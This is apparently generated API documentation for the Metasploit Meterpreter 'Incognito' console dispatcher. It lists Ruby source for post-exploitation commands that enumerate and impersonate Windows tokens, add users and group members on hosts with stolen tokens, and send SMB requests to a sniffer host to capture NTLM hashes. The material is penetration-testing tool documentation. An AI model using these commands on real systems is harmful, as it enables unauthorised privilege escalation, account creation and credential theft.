class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito

Privilege escalation extension user interface.

Constants

Klass

Public Class Methods

new(shell) click to toggle source

Initializes an instance of the priv command interaction.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 22
def initialize(shell)
  super
end

Public Instance Methods

cmd_add_group_user(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 176
def cmd_add_group_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_group_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  system_privilege_check

  groupname = args[0]
  username = args[1]

  client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
    print(string)
  }

  return true
end
cmd_add_localgroup_user(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 146
def cmd_add_localgroup_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_localgroup_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  system_privilege_check

  groupname = args[0]
  username = args[1]

  client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
    print(string)
  }

  return true
end
cmd_add_user(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 116
def cmd_add_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  system_privilege_check

  username = args[0]
  password = args[1]

  client.incognito.incognito_add_user(host, username, password).each_line { |string|
    print(string)
  }

  return true
end
cmd_impersonate_token(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 98
def cmd_impersonate_token(*args)
  if (args.length < 1)
    print_line("Usage: impersonate_token <token>\n")
    print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
    print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
    print_line("Hint: Enclose with quotation marks if name contains a space\n")
    return
  end

  system_privilege_check
  username = args[0]
  client.incognito.incognito_impersonate_token(username).each_line { |string|
    print(string)
  }

  return true
end
cmd_list_tokens(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 54
def cmd_list_tokens(*args)
  token_order = -1

  @@list_tokens_opts.parse(args) { |opt, idx, val|
    case opt
      when "-u"
        token_order = 0
      when "-g"
        token_order = 1
    end
  }

  if (token_order == -1)
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(token_order)

  print_line()
  print_line("Delegation Tokens Available")
  print_line("========================================")

  tokens['delegation'].each_line { |string|
    print(string)
  }

  print_line()
  print_line("Impersonation Tokens Available")
  print_line("========================================")

  tokens['impersonation'].each_line { |string|
    print(string)
  }

  print_line()

  return true
end
cmd_snarf_hashes(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 206
def cmd_snarf_hashes(*args)
  if (args.length < 1)
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  system_privilege_check

  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(args[0])
  print_line("[*] Done. Check sniffer logs")

  return true
end
commands() click to toggle source

List of supported commands.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 29
def commands
  {
    "add_user" => "Attempt to add a user with all tokens",
    "add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
    "add_group_user" => "Attempt to add a user to a global group with all tokens",
    "list_tokens" => "List tokens available under current user context",
    "impersonate_token" => "Impersonate specified token",
    "snarf_hashes" => "Snarf challenge/response hashes for every token"
  }
end
name() click to toggle source

Name for this dispatcher

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 232
def name
  "Incognito"
end
system_privilege_check() click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 222
def system_privilege_check
  if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
    print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
    print_line("             Call rev2self if primary process token is SYSTEM")
  end
end